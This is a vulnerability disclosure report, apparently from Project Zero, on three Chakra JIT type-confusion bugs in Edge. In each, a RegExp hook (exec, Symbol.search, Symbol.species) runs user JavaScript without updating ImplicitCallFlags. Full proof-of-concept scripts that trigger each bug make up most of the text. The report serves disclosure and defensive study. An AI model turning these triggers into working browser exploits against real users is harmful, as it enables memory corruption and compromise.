Microsoft Edge: Chakra: JIT: Multiple ImplicitCallFlags update bugs with RegExp




Microsoft Edge: Chakra: JIT: Multiple ImplicitCallFlags update bugs with RegExp




The same bug class as <a href="/p/project-zero/issues/detail?id=1334" title="Microsoft Edge: Chakra: JIT: RegexHelper::StringReplace must call the callback function with updating ImplicitCallFlags" class="closed_ref" rel="nofollow"> issue 1334 </a>(MSRC-40170): a RegExp helper that can call back into user JavaScript without updating ImplicitCallFlags, so JIT-compiled code continues to rely on type information that the callback has invalidated. Each of the three cases below follows the same shape: warm a function up, replace one RegExp hook with a callback that changes an array's element type, and call the compiled function once more.

1. Calling RegExp.prototype.exec without updating the "ImplicitCallFlags" flag in "JavascriptRegExp::CallExec".

// JIT target. The two stores to arr[0] bracket a RegExp call that can run
// user JavaScript (the re.exec override installed in main). Per the report,
// this call path (JavascriptRegExp::CallExec) does not update
// ImplicitCallFlags, so the compiled code presumably keeps the array type it
// inferred for arr across the call — TODO confirm against the generated code.
function opt(arr, re) {
// Establish arr as holding doubles before the call.
arr[0] = 1.1;
// String.prototype.match ends up invoking re.exec (user-controlled in main).
'a'.match(re);
// Denormal double whose raw 64-bit pattern is a small integer (about 0x1234);
// presumably chosen so a type-confused store leaves a recognizable value — verify.
arr[0] = 2.3023e-320;
}

// Driver: train the JIT on opt with an unmodified RegExp, then install a
// user-defined exec that mutates arr and call the compiled opt once more.
function main() {
// Array of doubles; likely stored as a native float array by Chakra — confirm.
let arr = [1.1, 2.2, 3.3];
let re = /a/;
// 0x2000 iterations: warm-up so opt gets JIT-compiled (the exact threshold
// is not shown here).
for (let i = 0; i < 0x2000; i++) {
opt(arr, re);
}

// User exec: runs inside the match call, stores an object into arr[0]
// (changing the array's element type), then returns null so match completes.
re.exec = function () {
arr[0] = {};
return null;
};

// On a correct engine this prints 2.3023e-320 (the last store in opt).
// print is the ChakraCore shell (ch) builtin; use console.log elsewhere.
opt(arr, re);
print(arr[0]);

}

// Run the PoC (case 1: RegExp.prototype.exec).
main();

2. Calling RegExp.prototype[Symbol.search] without updating the "ImplicitCallFlags" flag in "JavascriptString::CallRegExFunction".

// JIT target. Same shape as case 1, but the RegExp call is String.prototype
// .search, which invokes re[Symbol.search] (user-controlled in main). Per the
// report, JavascriptString::CallRegExFunction does not update ImplicitCallFlags
// for that call, so the compiled code presumably keeps the array type it
// inferred for arr across it — TODO confirm against the generated code.
function opt(arr, re) {
// Establish arr as holding doubles before the call.
arr[0] = 1.1;
// Result is intentionally kept in a local; leave the statement shape as-is,
// since the PoC depends on the exact code the JIT sees.
let r = 'a'.search(re);
// Denormal double whose raw 64-bit pattern is a small integer (about 0x1234);
// presumably chosen so a type-confused store leaves a recognizable value — verify.
arr[0] = 2.3023e-320;
}

// Driver: train the JIT on opt with an unmodified RegExp, then install a
// user-defined re[Symbol.search] that mutates arr and call the compiled opt
// once more.
function main() {
// Array of doubles; likely stored as a native float array by Chakra — confirm.
let arr = [1.1, 2.2, 3.3];
let re = /a/;
// 0x2000 iterations: warm-up so opt gets JIT-compiled (the exact threshold
// is not shown here).
for (let i = 0; i < 0x2000; i++) {
opt(arr, re);
}

// User search hook: runs inside 'a'.search(re), stores an object into arr[0]
// (changing the array's element type), then returns a valid index (0).
re[Symbol.search] = function () {
arr[0] = {};
return 0;
};

// On a correct engine this prints 2.3023e-320 (the last store in opt).
// print is the ChakraCore shell (ch) builtin; use console.log elsewhere.
opt(arr, re);
print(arr[0]);

}

// Run the PoC (case 2: RegExp.prototype[Symbol.search]).
main();

3. Calling Symbol.species without updating the "ImplicitCallFlags" flag in "RegexHelper::RegexEs6SplitImpl".

// JIT target. Same shape as cases 1 and 2, but the user callback is reached
// through String.prototype.split's species lookup (re.constructor[Symbol
// .species], user-controlled in main). Per the report,
// RegexHelper::RegexEs6SplitImpl does not update ImplicitCallFlags around that
// lookup, so the compiled code presumably keeps the array type it inferred for
// arr across the call — TODO confirm against the generated code.
function opt(arr, re) {
// Establish arr as holding doubles before the call.
arr[0] = 1.1;
// split reads re.constructor and its [Symbol.species] before matching.
'a'.split(re);
// Denormal double whose raw 64-bit pattern is a small integer (about 0x1234);
// presumably chosen so a type-confused store leaves a recognizable value — verify.
arr[0] = 2.3023e-320;
}

// Driver: train the JIT on opt with an unmodified RegExp, then replace
// re.constructor so split's species lookup runs user code that mutates arr,
// and call the compiled opt once more.
function main() {
// Array of doubles; likely stored as a native float array by Chakra — confirm.
let arr = [1.1, 2.2, 3.3];
let re = /a/;
// 0x2000 iterations: warm-up so opt gets JIT-compiled (the exact threshold
// is not shown here).
for (let i = 0; i < 0x2000; i++) {
opt(arr, re);
}

// Species hook: split's SpeciesConstructor step (per spec) reads
// re.constructor[Symbol.species] and invokes it with `new`; the function
// stores an object into arr[0] (changing the array's element type) and
// returns a fresh RegExp, which becomes the splitter since an object returned
// from a constructor replaces the newly created one.
re.constructor = {
[Symbol.species]: function () {
arr[0] = {};
return /a/;
}
};

// On a correct engine this prints 2.3023e-320 (the last store in opt).
// print is the ChakraCore shell (ch) builtin; use console.log elsewhere.
opt(arr, re);
print(arr[0]);

}

// Run the PoC (case 3: Symbol.species lookup in split).
main();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt